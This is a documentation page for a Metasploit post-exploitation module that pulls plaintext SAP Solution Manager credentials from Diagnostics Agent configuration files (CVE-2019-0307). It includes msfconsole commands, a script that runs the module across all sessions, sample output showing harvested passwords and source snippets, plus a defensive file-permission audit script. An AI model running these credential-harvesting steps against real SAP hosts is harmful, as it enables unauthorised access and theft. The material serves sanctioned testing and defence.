Diagnostics Agent in Solution Manager, stores unencrypted credentials for Solution Manager server - Metasploit


This page contains detailed information about how to use the post/multi/sap/smdagent_get_properties Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Diagnostics Agent in Solution Manager, stores unencrypted credentials for Solution Manager server
Module: post/multi/sap/smdagent_get_properties
Source code: modules/post/multi/sap/smdagent_get_properties.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): BSD, Linux, OSX, Unix, Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2019-0307

This module retrieves the secstore.properties file on a SMDAgent. This file contains the credentials used by the SMDAgent to connect to the SAP Solution Manager server.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/multi/sap/smdagent_get_properties

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/multi/sap/smdagent_get_properties
msf post(smdagent_get_properties) > show options
    ... show and set options ...
msf post(smdagent_get_properties) > set SESSION session-id
msf post(smdagent_get_properties) > exploit

If you wish to run the post module against all sessions from the framework, here is how:

1 - Create the following resource script:


<ruby>
# Run the post module once for every open session
framework.sessions.each_pair do |sid, session|
  run_single("use post/multi/sap/smdagent_get_properties")
  run_single("set SESSION #{sid}")
  run_single("run")
end
</ruby>

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Knowledge Base


Vulnerable Application


This module retrieves the secstore.properties file on a SMDAgent. This file contains the credentials used by the SMDAgent to connect to the SAP Solution Manager server.
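
A defender-side check for the exposure described above, as an added example that is not part of the module or the original page: it walks the agent directory layout seen in this page's module output (`<root>/<SID>/<instance>/SMDAgent/configuration/`) and reports `secstore.properties` and `runtime.properties` files whose POSIX mode grants access beyond the owner. The function names, the sample tree and the policy that only the agent's OS account needs these files are assumptions; it covers Unix-like hosts only.

```ruby
require 'tmpdir'
require 'fileutils'

# The two files the module output on this page shows being collected.
CONFIG_FILES = %w[secstore.properties runtime.properties].freeze

# Return one finding per agent config file whose mode bits grant
# group or world access (assumed policy: owner-only, e.g. 0600).
def audit_smdagent_configs(sap_root)
  findings = []
  pattern = File.join(sap_root, '*', '*', 'SMDAgent', 'configuration')
  Dir.glob(pattern).sort.each do |conf_dir|
    instance = conf_dir.split(File::SEPARATOR)[-3]
    next if instance == 'SYS' # skipped in the module source excerpt as well
    CONFIG_FILES.each do |name|
      path = File.join(conf_dir, name)
      next unless File.file?(path)
      mode = File.stat(path).mode & 0o777
      issues = []
      issues << 'group-readable' if (mode & 0o040) != 0
      issues << 'world-readable' if (mode & 0o004) != 0
      issues << 'group/world-writable' if (mode & 0o022) != 0
      next if issues.empty?
      findings << { instance: instance, path: path, mode: format('%04o', mode), issues: issues }
    end
  end
  findings
end

# Constructed sample tree (placeholder content, not real SAP data):
# SMDA98 has a lax file mode, SMDA97 a tight one.
def demo_audit
  Dir.mktmpdir('sap-audit') do |root|
    { 'SMDA98' => 0o644, 'SMDA97' => 0o600 }.each do |inst, mode|
      dir = File.join(root, 'DAA', inst, 'SMDAgent', 'configuration')
      FileUtils.mkdir_p(dir)
      file = File.join(dir, 'secstore.properties')
      File.write(file, "# constructed placeholder\n")
      File.chmod(mode, file)
    end
    audit_smdagent_configs(root)
  end
end

if __FILE__ == $PROGRAM_NAME
  audit_smdagent_configs(ARGV[0] || '/usr/sap').each { |f| puts "#{f[:mode]} #{f[:path]} (#{f[:issues].join(', ')})" }
end
```

Run it on an agent host with the SAP root as the first argument; it defaults to /usr/sap and prints nothing when no lax file is found.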

Verification Steps


  1. Get a shell or meterpreter session on some host.
  2. Do: use post/multi/sap/smdagent_get_properties
  3. Do: set SESSION [SESSION_ID], replacing [SESSION_ID] with the session number you wish to run this on.
  4. Do: run
  5. If the system has configuration files containing unencrypted credentials for the SAP Solution Manager server, they will be printed out.

Options


None.

Scenarios


msf6 post(multi/sap/smdagent_get_properties) > sessions

Active sessions
===============

  Id  Name  Type                     Information                             Connection
  --  ----  ----                     -----------                             ----------
  1         shell linux              SSH daaadm:TestPass1 (172.16.30.14:22)  192.168.50.2:58316 -> 172.16.30.14:22 (172.16.30.14)
  2         meterpreter x64/windows  SAP731\Administrator @ SAP731           0.0.0.0:0 -> 172.16.30.80:4444 (172.16.30.80)

msf6 post(multi/sap/smdagent_get_properties) > set SESSION 1
SESSION => 1
msf6 post(multi/sap/smdagent_get_properties) > run

[+] File /usr/sap/DAA/SMDA98/SMDAgent/configuration/runtime.properties saved in: /Users/vladimir/.msf4/loot/20210329205801_SAP_TEST_172.16.30.14_smdagent.propert_457968.txt
[+] File /usr/sap/DAA/SMDA98/SMDAgent/configuration/secstore.properties saved in: /Users/vladimir/.msf4/loot/20210329205811_SAP_TEST_172.16.30.14_smdagent.propert_587689.txt

[*] Instance: SMDA98
[*] Runtime properties file name: /usr/sap/DAA/SMDA98/SMDAgent/configuration/runtime.properties
[*] Secstore properties file name: /usr/sap/DAA/SMDA98/SMDAgent/configuration/secstore.properties

[*] SLD properties:
[*] SLD protocol: http
[*] SLD hostname: solman.corp.test.com
[*] SLD port: 50000
[+] SLD username: j2ee_admin
[+] SLD password: asdQWE123

[*] SMD properties:
[*] SMD url: p4://172.16.30.46:50004
[+] SMD username: j2ee_admin
[+] SMD password: asdQWE123

[+] Store decoded credentials for SolMan server
[*] Post module execution completed
msf6 post(multi/sap/smdagent_get_properties) > set SESSION 2
SESSION => 2
msf6 post(multi/sap/smdagent_get_properties) > run

[+] File c:\usr\sap\DAA\SMDA97\SMDAgent\configuration\runtime.properties saved in: /Users/vladimir/.msf4/loot/20210329205823_SAP_TEST_172.16.30.80_smdagent.propert_357417.txt
[+] File c:\usr\sap\DAA\SMDA97\SMDAgent\configuration\secstore.properties saved in: /Users/vladimir/.msf4/loot/20210329205823_SAP_TEST_172.16.30.80_smdagent.propert_604626.txt

[*] Instance: SMDA97
[*] Runtime properties file name: c:\usr\sap\DAA\SMDA97\SMDAgent\configuration\runtime.properties
[*] Secstore properties file name: c:\usr\sap\DAA\SMDA97\SMDAgent\configuration\secstore.properties

[*] SLD properties:
[*] SLD protocol: http
[*] SLD hostname: 172.16.30.46
[*] SLD port: 50000
[+] SLD username: SLDDSUSER
[+] SLD password: asdQWE123

[*] SMD properties:
[*] SMD url: p4://172.16.30.46:50004
[+] SMD username: j2ee_admin
[+] SMD password: asdQWE123

[+] Store decoded credentials for SolMan server
[*] Post module execution completed
msf6 post(multi/sap/smdagent_get_properties) > creds
Credentials
===========

host           origin         service           public      private    realm  private_type  JtR Format
----           ------         -------           ------      -------    -----  ------------  ----------
172.16.30.100  172.16.30.100  50000/tcp (http)  j2ee_admin  asdQWE123         Password
172.16.30.100  172.16.30.100  50000/tcp (http)  SLDDSUSER   asdQWE123         Password

msf6 post(multi/sap/smdagent_get_properties) > services
Services
========

host           port   proto  name  state  info
----           ----   -----  ----  -----  ----
172.16.30.46   50000  tcp    soap  open   SAP Solution Manager

msf6 post(multi/sap/smdagent_get_properties) > vulns

Vulnerabilities
===============

Timestamp                Host          Name                                                       References
---------                ----          ----                                                       ----------
2021-03-29 17:58:11 UTC  172.16.30.14  Diagnostics Agent in Solution Manager, stores unencrypted  CVE-2019-0307,URL-https://conference.hitb.org/hitblockdown
                                        credentials for Solution Manager server                   002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who
                                                                                                  %20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf
2021-03-29 17:58:23 UTC  172.16.30.80  Diagnostics Agent in Solution Manager, stores unencrypted  CVE-2019-0307,URL-https://conference.hitb.org/hitblockdown
                                        credentials for Solution Manager server                   002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who
                                                                                                  %20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf

Msfconsole Usage


Here is how the multi/sap/smdagent_get_properties post exploitation module looks in the msfconsole:

msf6 > use post/multi/sap/smdagent_get_properties

msf6 post(multi/sap/smdagent_get_properties) > show info

       Name: Diagnostics Agent in Solution Manager, stores unencrypted credentials for Solution Manager server
     Module: post/multi/sap/smdagent_get_properties
   Platform: BSD, Linux, OSX, Unix, Windows
       Arch: 
       Rank: Normal

Provided by:
  Yvan Genuer
  Vladimir Ivanov

Compatible session types:
  Meterpreter
  Shell

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module retrieves the `secstore.properties` file on a SMDAgent. 
  This file contains the credentials used by the SMDAgent to connect 
  to the SAP Solution Manager server.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2019-0307
  https://conference.hitb.org/hitblockdown002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who%20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf

Module Options


This is a complete list of options available in the multi/sap/smdagent_get_properties post exploitation module:

msf6 post(multi/sap/smdagent_get_properties) > show options

Module options (post/multi/sap/smdagent_get_properties):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Advanced Options


Here is a complete list of advanced options supported by the multi/sap/smdagent_get_properties post exploitation module:

msf6 post(multi/sap/smdagent_get_properties) > show advanced

Module advanced options (post/multi/sap/smdagent_get_properties):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the multi/sap/smdagent_get_properties module can do:

msf6 post(multi/sap/smdagent_get_properties) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the multi/sap/smdagent_get_properties post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(multi/sap/smdagent_get_properties) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Error Messages


This module may fail with the following error messages:

Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.

SAP root directory not found


Here is a relevant code snippet related to the "SAP root directory not found" error message:

      windows = false
      instances = dir(UNIX_PREFIX)
    end

    if instances.nil? || instances.empty?
      fail_with(Failure::NotFound, 'SAP root directory not found')
    end

    instances.each do |instance|
      next if instance == 'SYS'

Failed to resolve SLD hostname: <SLD_HOSTNAME>


Here is a relevant code snippet related to the "Failed to resolve SLD hostname: <SLD_HOSTNAME>" error message:

            else
              begin
                sld_address = session.net.resolve.resolve_host(sld_hostname)[:ip]
                print_status("SLD address: #{sld_address}")
              rescue Rex::Post::Meterpreter::RequestError
                print_error("Failed to resolve SLD hostname: #{sld_hostname}")
              end
            end
          end
        end
        print_status("SLD port: #{sld_port}") unless sld_port.nil?

File <SECSTORE_PROPERTIES_FILE_NAME> read, but this file is likely encrypted or does not contain credentials. This SMDAgent is likely patched.


Here is a relevant code snippet related to the "File <SECSTORE_PROPERTIES_FILE_NAME> read, but this file is likely encrypted or does not contain credentials. This SMDAgent is likely patched." error message:

      end

      # Store decoded credentials, report service and vuln
      print_line
      if sld_username.nil? || sld_password.nil?
        print_error("File #{secstore_properties_file_name} read, but this file is likely encrypted or does not contain credentials. This SMDAgent is likely patched.")
      else
        # Store decoded credentials
        print_good('Store decoded credentials for SolMan server')
        if sld_address.nil? || sld_port.nil?
          service_data = {}

Failed to read properties file: <FILENAME>


Here is a relevant code snippet related to the "Failed to read properties file: <FILENAME>" error message:

  def parse_properties_file(filename, is_meterpreter)
    properties = []
    if file_exist?(filename)
      properties_content = read_file(filename)
      if properties_content.nil?
        print_error("Failed to read properties file: #{filename}")
      else
        if is_meterpreter
          agent_host = Rex::Socket.getaddress(session.sock.peerhost, true)
        else
          agent_host = session.session_host

File: <FILENAME> does not exist


Here is a relevant code snippet related to the "File: <FILENAME> does not exist" error message:

        loot = store_loot('smdagent.properties', 'text/plain', agent_host, properties_content, filename, 'SMD Agent properties file')
        print_good("File #{filename} saved in: #{loot}")
        properties = parse_properties(properties_content)
      end
    else
      print_error("File: #{filename} does not exist")
    end
    properties
  end

end

Authors


  • Yvan Genuer
  • Vladimir Ivanov

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.